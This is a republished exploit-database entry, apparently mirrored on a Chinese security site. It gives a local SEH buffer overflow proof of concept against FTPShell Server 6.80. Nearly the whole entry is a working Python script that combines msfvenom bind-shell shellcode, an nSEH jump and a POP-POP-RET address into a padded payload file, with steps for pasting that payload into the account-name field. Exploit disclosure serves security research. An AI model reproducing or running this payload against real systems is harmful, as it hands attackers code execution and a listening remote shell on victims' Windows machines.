FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH)
|
来源:luismtzsilva at gmail.com 作者:Martínez 发布时间:2018-09-06
|
|
# Exploit Title: FTPShell Server 6.80 - 'Add Account Name' Buffer Overflow (SEH) # Discovery by: Luis Martinez # Discovery Date: 2018-09-04 # Vendor Homepage: http://www.ftpshell.com/ # Software Link: http://www.ftpshell.com/downloadserver.htm # Tested Version: 6.80 # Vulnerability Type: Buffer Overflow (SEH) Local # Tested on OS: Windows XP Professional SP3 x86 es # Steps to Produce the Buffer Overflow (SEH): # 1.- Run python code : FTPShell_Server_6.80.py # 2.- Open FTPShell_Server_6.80.txt and copy content to clipboard # 3.- Open FTPShell Server Administrator # 4.- Manage FTP Accounts... # 5.- Add Account Name # 6.- Paste ClipBoard on "Account name to ban" # 7.- OK #!/usr/bin/env python #msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c shellcode = ( "\xbb\x3c\xd8\x80\xcc\xda\xc3\xd9\x74\x24\xf4\x5a\x31\xc9\xb1" "\x53\x31\x5a\x12\x03\x5a\x12\x83\xd6\x24\x62\x39\xda\x3d\xe1" "\xc2\x22\xbe\x86\x4b\xc7\x8f\x86\x28\x8c\xa0\x36\x3a\xc0\x4c" "\xbc\x6e\xf0\xc7\xb0\xa6\xf7\x60\x7e\x91\x36\x70\xd3\xe1\x59" "\xf2\x2e\x36\xb9\xcb\xe0\x4b\xb8\x0c\x1c\xa1\xe8\xc5\x6a\x14" "\x1c\x61\x26\xa5\x97\x39\xa6\xad\x44\x89\xc9\x9c\xdb\x81\x93" "\x3e\xda\x46\xa8\x76\xc4\x8b\x95\xc1\x7f\x7f\x61\xd0\xa9\xb1" "\x8a\x7f\x94\x7d\x79\x81\xd1\xba\x62\xf4\x2b\xb9\x1f\x0f\xe8" "\xc3\xfb\x9a\xea\x64\x8f\x3d\xd6\x95\x5c\xdb\x9d\x9a\x29\xaf" "\xf9\xbe\xac\x7c\x72\xba\x25\x83\x54\x4a\x7d\xa0\x70\x16\x25" "\xc9\x21\xf2\x88\xf6\x31\x5d\x74\x53\x3a\x70\x61\xee\x61\x1d" "\x46\xc3\x99\xdd\xc0\x54\xea\xef\x4f\xcf\x64\x5c\x07\xc9\x73" "\xa3\x32\xad\xeb\x5a\xbd\xce\x22\x99\xe9\x9e\x5c\x08\x92\x74" "\x9c\xb5\x47\xe0\x94\x10\x38\x17\x59\xe2\xe8\x97\xf1\x8b\xe2" "\x17\x2e\xab\x0c\xf2\x47\x44\xf1\xfd\x76\xc9\x7c\x1b\x12\xe1" "\x28\xb3\x8a\xc3\x0e\x0c\x2d\x3b\x65\x24\xd9\x74\x6f\xf3\xe6" "\x84\xa5\x53\x70\x0f\xaa\x67\x61\x10\xe7\xcf\xf6\x87\x7d\x9e" "\xb5\x36\x81\x8b\x2d\xda\x10\x50\xad\x95\x08\xcf\xfa\xf2\xff" "\x06\x6e\xef\xa6\xb0\x8c\xf2\x3f\xfa\x14\x29\xfc\x05\x95\xbc" "\xb8\x21\x85\x78\x40\x6e\xf1\xd4\x17\x38\xaf\x92\xc1\x8a\x19" "\x4d\xbd\x44\xcd\x08\x8d\x56\x8b\x14\xd8\x20\x73\xa4\xb5\x74" "\x8c\x09\x52\x71\xf5\x77\xc2\x7e\x2c\x3c\xf2\x34\x6c\x15\x9b" "\x90\xe5\x27\xc6\x22\xd0\x64\xff\xa0\xd0\x14\x04\xb8\x91\x11" "\x40\x7e\x4a\x68\xd9\xeb\x6c\xdf\xda\x39") nSEH = "\xEB\x06\x90\x90" SEH = "\x47\x05\xFC\x7F" #7FFC0547 POP EDI buffer = "\x41" * 1268 + nSEH + SEH + shellcode f = open ("FTPShell_Server_6.80.txt", "w") f.write(buffer) f.close()
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|